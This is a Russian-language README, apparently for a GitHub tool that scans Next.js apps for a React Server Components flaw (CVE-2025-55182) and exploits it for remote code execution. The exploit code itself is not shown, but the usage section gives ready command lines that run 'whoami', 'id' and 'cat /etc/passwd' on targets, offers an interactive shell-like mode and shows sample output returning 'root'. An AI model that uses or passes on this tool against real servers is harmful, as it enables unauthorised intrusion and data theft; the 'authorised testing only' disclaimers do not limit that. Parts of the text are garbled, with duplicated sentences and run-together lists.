
Безопасный сканер на Python для обнаружения и эксплуатации уязвимостей **React Server Components (RSC)** в приложениях Next.js. Этот инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование на эксплуатацию RCE.
Безопасностный сканер на Python для обнаружения и эксплуатации уязвимостей React Server Components (RSC) в приложениях Next.js. Инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование эксплуатации RCE.
⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте письменное разрешение перед тестированием.
✅ Пассивное обнаружение — анализирует HTML, заголовки и структуру страницы на наличие индикаторов RSC
✅ Активное снятие отпечатков — отправляет RSC-специфичные заголовки для обнаружения ответов сервера
✅ Анализ HTTP-заголовков — выявляет заголовки, связанные с Next.js и RSC
✅ Эксплуатация RCE — выполняет команды на уязвимых серверах (если эксплойт возможен)
✅ Цветной вывод в терминал — улучшенная визуальная обратная связь для лучшей читаемости
✅ Интерактивный режим — выполнение нескольких команд в режиме эксплуатации
✅ Надёжное декодирование — обработка gzip-сжатых и бинарных полезных нагрузок
Клонируйте репозиторий
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Установите зависимости
pip install -r requirements.txt
Требуемые пакеты:
requests>=2.28.0 — библиотека HTTP-клиентаurllib3>=1.26.0 — расширенные утилиты HTTPcolorama>=0.4.6 — цвета терминала (совместимо с Windows)beautifulsoup4 — парсинг HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Затем вводите команды в приглашении (введите quit для выхода).
| Опция | Описание |
|---|---|
<URL> | URL цели (обязательно). Автоматически добавляется https://, если отсутствует |
--exploit | Включить эксплуатацию RCE после обнаружения |
--cmd <команда> | Выполнить определённую команду (используйте с --exploit) |
Обнаружение уязвимости RSC:
python rsc_detector.py https://target.com
Эксплуатация и выполнение команды id:
python rsc_detector.py https://target.com --exploit --cmd "id"
Эксплуатация и выполнение cat /etc/passwd:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Интерактивный режим (несколько команд):
python rsc_detector.py https://target.com --exploit
window.__next_f (маршрутизатор приложений Next.js)text/x-component__NEXT_DATA__ и импортов Next.jsServer, Vary и X-Nextjs-CacheRSC: 1[*] Запуск сканирования RSC Detection на: https://example.com
====================================================================
[1] Выполнение пассивного сканирования...
Статус: ОБНАРУЖЕНО
Оценка: 80/100
- Найдено: window.__next_f (App Router)
[2] Анализ заголовков...
- Заголовок Vary включает RSC: ...
[3] Выполнение активного снятия отпечатков...
Статус: ОБНАРУЖЕНО
- Content-Type ответа стал text/x-component
- Заголовок Vary содержит 'RSC'
====================================================================
[ИТОГОВЫЙ РЕЗУЛЬТАТ] УЯЗВИМО
[!] Это приложение, по-видимому, уязвимо для атак на основе RSC!
Рекомендуется: возможна эксплуатация RCE
[*] Выполнение команды: whoami
[+] Команда выполнена успешно!
[ВЫВОД]
root
CVE-2025-55182 использует:
child_process.execSync()Этот инструмент СТРОГО ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ:
Несанкционированный доступ к компьютеру незаконен согласно:
Если вы обнаружите уязвимость с помощью этого инструмента:
Инструмент по умолчанию игнорирует проверку SSL. Чтобы включить проверку:
detector = RSCDetector(url, verify_ssl=True)
Инструмент автоматически:
Увеличьте тайм-аут в коде:
response = self.session.get(self.url, timeout=30) # 30 секунд
CVE-2025-55182/
├── README.md # Этот файл
├── requirements.txt # Зависимости Python
├── rsc_detector.py # Основной сканер и движок эксплойта
├── rsc_cli.py # Утилиты CLI (если есть)
├── script.py # Дополнительные скрипты (если есть)
├── COLOR_GUIDE.md # Документация цветного вывода
└── .gitignore # Правила игнорирования Git
requests>=2.28.0 # HTTP-запросы
urllib3>=1.26.0 # Расширенный HTTP
beautifulsoup4>=4.11.0 # Парсинг HTML
colorama>=0.4.6 # Цвета терминала (Windows)
Установить всё сразу:
pip install -r requirements.txt